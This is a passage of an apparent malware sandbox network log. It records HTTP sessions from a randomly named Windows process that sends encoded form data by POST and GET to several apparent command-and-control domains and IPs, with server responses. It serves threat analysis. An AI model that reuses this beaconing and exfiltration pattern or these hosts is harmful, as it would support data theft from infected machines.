                                                                                      Data Ascii: 3vNdCBvX=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVUp7WxVIDi1TfqR22BVR6wlVQdc60BHyIywHEWMRsubS6fIF2zRpDJ42in6KJ6e1afdcsLn1JbKPjuO2gpy7zYx104TlmQmrPBGvNMTAEUER8xLOtH9BubHsHkGGhh1DuRhpKbZKigockGmcGqgT6VqsReNipU9StrHkr9J6Irzdzgc=
                                                                                      Nov 24, 2024 08:11:45.590243101 CET | 658 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:11:45 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 514
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      27  192.168.2.4  50004  203.161.43.228  80  4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:11:47.008352995 CET  10827  OUT  POST /6urf/ HTTP/1.1
                                                                                      Host: www.connecty.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.connecty.live
                                                                                      Referer: http://www.connecty.live/6urf/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX= [TRUNCATED]
                                                                                      Nov 24, 2024 08:11:48.403644085 CET  658  IN  HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:11:48 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 514
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      28  192.168.2.4  50010  203.161.43.228  80  4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:11:49.674581051 CET  461  OUT  GET /6urf/?3vNdCBvX=l+g0G83zvX30P9FiLKUhk1gZnSMwjxKGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR6e8+1gk4cvE7j0i5NK3NPPZTmYTXI7istro=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.connecty.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:11:50.893698931 CET  673  IN  HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:11:50 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 514
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      29  192.168.2.4  50026  13.248.169.48  80  4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:11:56.549448967 CET  710  OUT  POST /cpgr/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.tals.xyz
                                                                                      Referer: http://www.tals.xyz/cpgr/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=/Wn5zNWl0nSaoVrwWE0JsEri8BNPv7gHNp/wkeLrDVG0NJt6/ZELIisWzg5vRNGWOtuMkdy1Qcq9oLo8uFKZQQj1vnMmyWGERV1kRGP9PW+IPiV7MKvSR9C58EuHOiqud1PJtpQIeW/ctmbqxAqmIaMXK2Du4g1RWhJmXPCf6s4kcx8H4BTfVTpOoRuWUZxfPA==


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      30  192.168.2.4  50032  13.248.169.48  80  4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:11:59.213794947 CET  730  OUT  POST /cpgr/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.tals.xyz
                                                                                      Referer: http://www.tals.xyz/cpgr/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmi0NsJ6w9oLJisW4A52ftGNOtiqkZ61QYC9oKY8tyeaCQjziHMktmGERV1kRGrbPWWIPSl7MrvdfdC61kuHKiqqd1POto8ueUHctkDqxRqnGaMdFWCD5DMBQjcAJMyL3YITQXxdpwyIHTN91WniZaMWUDGf/wxrMmSZhTV278c95sA=


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      31  192.168.2.4  50033  13.248.169.48  80  4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:12:01.885327101 CET  10812  OUT  POST /cpgr/ HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.tals.xyz
                                                                                      Referer: http://www.tals.xyz/cpgr/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX= [TRUNCATED]


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      32  192.168.2.4  50034  13.248.169.48  80  4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:12:04.553461075 CET  456  OUT  GET /cpgr/?3vNdCBvX=yUPZw4O96lKRgUDhHw42lX6F/Rxn05lUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjFijspiVTtXDCDHBic1mdKVGnCgRAN7vlfYA=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.tals.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:05.645957947 CET  398  IN  HTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Sun, 24 Nov 2024 07:12:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 258
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3vNdCBvX=yUPZw4O96lKRgUDhHw42lX6F/Rxn05lUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjFijspiVTtXDCDHBic1mdKVGnCgRAN7vlfYA=&etx=BXy4elO0X"}</script></head></html>


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      33  192.168.2.4  50035  147.255.21.187  80  4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:12:11.487574100 CET  716  OUT  POST /u9hy/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.50food.com
                                                                                      Referer: http://www.50food.com/u9hy/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=bo4LrJQp5WjRPmyPawi8PLuKBY1GmkY9xp+0chdd5hWTVgMcU/QYEJW2pIX4SMD+LEFn8yCGgjSHRZyh4pQZCLZlEBrtsAUgH2EruNZxoaRlLPwyHTjgw2/VybbjJHBewCoUdU32G/kQTQ7WSgf6gYOd3o2gSz4gt42lJeLd7L2ad5fjoIWpklQJOMLqD1mexw==
                                                                                      Nov 24, 2024 08:12:12.740991116 CET  309  IN  HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:07 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      34  192.168.2.4  50036  147.255.21.187  80  4544  C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 24, 2024 08:12:14.193451881 CET  736  OUT  POST /u9hy/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.50food.com
                                                                                      Referer: http://www.50food.com/u9hy/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5TiTVB8cGr8YBJW2noWwcsD5LEZV8z+GgjGHRamh44QeCbZnMhrrigUgH2EruNMaob1lK8YyGxLjsm/Szbbje3BawCo6dV7cG5gQTV/WTxf5uYOH5I3HUmNa3bDbD8Om8qScY/S5553+2l06TLCeO2bXq76BY6RIPTsqwAwiYoF4kA8=
                                                                                      Nov 24, 2024 08:12:15.407304049 CET  309  IN  HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      35 | 192.168.2.4 | 50037 | 147.255.21.187 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:16.903873920 CET | 10818 | OUT | POST /u9hy/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.50food.com
                                                                                      Referer: http://www.50food.com/u9hy/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:18.190557957 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      36 | 192.168.2.4 | 50038 | 147.255.21.187 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:19.576195002 CET | 458 | OUT | GET /u9hy/?3vNdCBvX=WqQro+xdjTeJIlGwaHeXAa2bD6tPyTI49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxIpJrNQCfkQktXm0b+9FyofxiDukpHyXFoA4=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:20.825225115 CET | 141 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      37 | 192.168.2.4 | 50039 | 104.21.42.77 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:26.345483065 CET | 740 | OUT | POST /f8c6/ HTTP/1.1
                                                                                      Host: www.zriaraem-skiry.sbs
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.zriaraem-skiry.sbs
                                                                                      Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=nbjRd4jDDoGnShAK7ZL6V8b840uly6gWRWodyeqTLCj1DtczpuEQh7rFnbzTELeLftP7TgAHVG+dgUq9LBmm4hDu4v0jgrjZRN//FFGHUt5F38oD8w5RbHyKUzEYFl9oE/I+rD4p2TNmZtoZj21SUTEaYxHbsYwP9Fy3XRglrBxS2OqzusN8FzLovEASwtMsvQ==
                                                                                      Nov 24, 2024 08:12:27.641200066 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:27 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBf1BjCvoiC1SKu16txwjLORJtdwAflJvnPVMD7uoQXCMcbVbQdLLZ8MWbE3M%2Fb9BPRu2m73E4YBQ7AzBYZPeqC78ORTKK9m118VIuVBpUKBMY9UR4oPKsPCuK0HGZ6TYVJUQPi7uMbM"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e77973a5fc741c1-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Nov 24, 2024 08:12:27.641267061 CET | 334 | IN


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      38 | 192.168.2.4 | 50040 | 104.21.42.77 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:29.008268118 CET | 760 | OUT | POST /f8c6/ HTTP/1.1
                                                                                      Host: www.zriaraem-skiry.sbs
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.zriaraem-skiry.sbs
                                                                                      Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Ascii: 3vNdCBvX=nbjRd4jDDoGnTBwK5536c8b73UulkKhdRXUdybKDLQX1G4gzmPEQxrrFoLzSKreMftSMTlAHVHadgQ69LQnU7RDs3P0h/7jZRN//FFCtUthF3M4Dzx5SRnyJdTEYU19kE/JdrBMT2X9mZvgZjipdPjEmWRGi9Y53717GSwIlqAJO6onp/dsrXzvbyDJm9uxl0QIycIElI3sBXlg4JBXwggE=
                                                                                      Nov 24, 2024 08:12:30.335587978 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jc13MpNOkPSm%2FHCpuh0AsaK8KFSNwt4%2BJz0QSc8P%2BAIOrgVBoLP%2FPJVm8yiGz2GogPEWldPSg%2Fej5X%2FbbAHevb7q3n1x4XtVlYhE49e0gg%2Fwna%2BrMmFxi7nVxYLLJ3VD5FbkslM7UW4G"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e77974b3c5fc325-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1483&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Nov 24, 2024 08:12:30.335604906 CET | 348 | IN


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      39 | 192.168.2.4 | 50041 | 104.21.42.77 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:31.857707977 CET | 10842 | OUT | POST /f8c6/ HTTP/1.1
                                                                                      Host: www.zriaraem-skiry.sbs
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.zriaraem-skiry.sbs
                                                                                      Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:33.076814890 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:32 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1AgBr3xSXfcRde%2FSAIDDN9sIKwa1vbLebtGg8HcQqLR2diOP22MxOzsy76fu0Es9np2gSxqNwKAzGEfj1txMU8KvHy1yHg6IktTiwGi3G01hlqHbG8085LuRQepcj%2FSZQseL1QhHl9Ko"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e77975c8fa21a34-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1783&sent=3&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10842&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Nov 24, 2024 08:12:33.076905012 CET | 334 | IN
                                                                                      Nov 24, 2024 08:12:33.077071905 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      40 | 192.168.2.4 | 50042 | 104.21.42.77 | 80 | 4544 | C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 24, 2024 08:12:34.569503069 CET | 466 | OUT | GET /f8c6/?3vNdCBvX=qZLxeIvUMpnHejM+2fTaZNrv2WO4y9kWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgsy7m2PREgKHVMtzZClnOVsBz8/E/4iFHS34=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.zriaraem-skiry.sbs
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:35.944679022 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:35 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XU%2B%2FeBuyhZbQaCVHCP8THNIc8pBHNmgYv2RthtfTySjzC3HuAWKYDvZPTfdes3m7Yyo%2FAeOtdcQ7JtJIhih4f4wDjWWOuRh7D4%2BJX5T6%2Ft20IOZJOzmPdYucrZfsFbZEjFmkLTLA%2BUjy"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e77976dee424261-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Ascii: 57d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font
                                                                                      Nov 24, 2024 08:12:35.944747925 CET | 1005 | IN | Data Raw: 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74
